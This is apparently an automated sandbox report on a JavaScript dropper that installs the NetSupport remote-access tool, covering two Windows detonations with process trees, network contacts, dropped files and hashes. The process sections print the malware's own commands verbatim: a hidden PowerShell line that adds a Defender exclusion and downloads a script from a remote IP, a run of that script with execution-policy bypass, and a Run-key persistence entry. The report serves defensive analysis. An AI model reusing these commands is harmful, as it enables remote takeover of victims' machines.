Malware Analysis Report

2025-06-16 05:06

Sample ID 230527-kwgllabd27
Target 02303299.js
SHA256 64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81

Threat Level: Known bad

The file 02303299.js was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

Process spawned unexpected child process

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-27 08:56

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-27 08:56

Reported

2023-05-27 08:59

Platform

win7-20230220-en

Max time kernel

30s

Max time network

34s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js

C:\Windows\system32\cmd.exe

cmd /c start /MIN C:\ProgramData\BLD.bat

C:\Windows\system32\cmd.exe

cmd /c start C:\ProgramData\zayavka2.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt

Network

Country Destination Domain Proto
US 188.227.59.169:80 188.227.59.169 tcp

Files

C:\ProgramData\BLD.bat

MD5 018d63793042f588a85968475d98decf
SHA1 2c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256 afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512 ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a

C:\ProgramData\zayavka2.txt

MD5 6cea5f86700d707b53b8f4a67d1ccf29
SHA1 37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA256 6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512 d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29

memory/1652-71-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1652-72-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

memory/1652-73-0x0000000002390000-0x0000000002398000-memory.dmp

memory/1652-75-0x000000000252B000-0x0000000002562000-memory.dmp

memory/1652-74-0x0000000002524000-0x0000000002527000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-27 08:56

Reported

2023-05-27 08:59

Platform

win10v2004-20230220-en

Max time kernel

143s

Max time network

153s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js

Signatures

NetSupport

rat netsupport

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VCRuntmeLib_1 = "C:\\Users\\Admin\\AppData\\Roaming\\VCRuntmeLib_1\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js

C:\Windows\system32\cmd.exe

cmd /c start /MIN C:\ProgramData\BLD.bat

C:\Windows\system32\cmd.exe

cmd /c start C:\ProgramData\zayavka2.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -ep bypass C:\ProgramData\archive.ps1

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

"C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"

Network

Country Destination Domain Proto
US 188.227.59.169:80 188.227.59.169 tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 169.59.227.188.in-addr.arpa udp
US 188.227.59.169:80 188.227.59.169 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 250.255.255.239.in-addr.arpa udp
US 8.8.8.8:53 golden-scalen.com udp
US 86.38.202.175:80 golden-scalen.com tcp
US 86.38.202.175:443 golden-scalen.com tcp
US 8.8.8.8:53 175.202.38.86.in-addr.arpa udp
US 8.8.8.8:53 xoomep1.com udp
NL 80.66.88.143:1935 xoomep1.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 51.142.119.24:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 143.88.66.80.in-addr.arpa udp
US 8.8.8.8:53 24.119.142.51.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
NL 87.248.202.1:80 tcp
US 40.125.122.176:443 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp

Files

C:\ProgramData\BLD.bat

MD5 018d63793042f588a85968475d98decf
SHA1 2c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256 afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512 ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a

C:\ProgramData\zayavka2.txt

MD5 6cea5f86700d707b53b8f4a67d1ccf29
SHA1 37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA256 6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512 d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29

memory/3844-145-0x00000232237A0000-0x00000232237C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xstt41or.rrw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3844-151-0x0000023223260000-0x0000023223270000-memory.dmp

memory/3844-146-0x0000023223260000-0x0000023223270000-memory.dmp

memory/3844-155-0x0000023223260000-0x0000023223270000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 02a1a26525c65a359d41483180eaa6f7
SHA1 c0e2578b92d20e925c1c87016d1a9fccee1ec56f
SHA256 d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e
SHA512 d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2

C:\ProgramData\archive.ps1

MD5 50dc5faa02227c0aefa8b54c8e5b2b0d
SHA1 27fe39b6b053685d4c781a7fa809840ebaab15d7
SHA256 aafc02e9f9c6ce1e9ff7aff753e5656d3d26041e06b78a9fd60ca6fe5127e09b
SHA512 5bb8701fa6b026e99a8f269b89660ee8abba7c88a654f756d455a13e418a29c75e1742278046985bcc599151f0838591ef58ae8f742016153e43c8c5a78da442

memory/4976-168-0x0000020DF8C70000-0x0000020DF8C7A000-memory.dmp

memory/4976-169-0x0000020DF8CF0000-0x0000020DF8D00000-memory.dmp

memory/4976-170-0x0000020DF9AB0000-0x0000020DF9AC4000-memory.dmp

memory/4976-171-0x0000020DF9AF0000-0x0000020DF9B02000-memory.dmp

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

MD5 c4f1b50e3111d29774f7525039ff7086
SHA1 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

MD5 c4f1b50e3111d29774f7525039ff7086
SHA1 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICL32.DLL

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

memory/3844-211-0x0000023223260000-0x0000023223270000-memory.dmp

C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

memory/4768-220-0x00000000749C0000-0x00000000749CE000-memory.dmp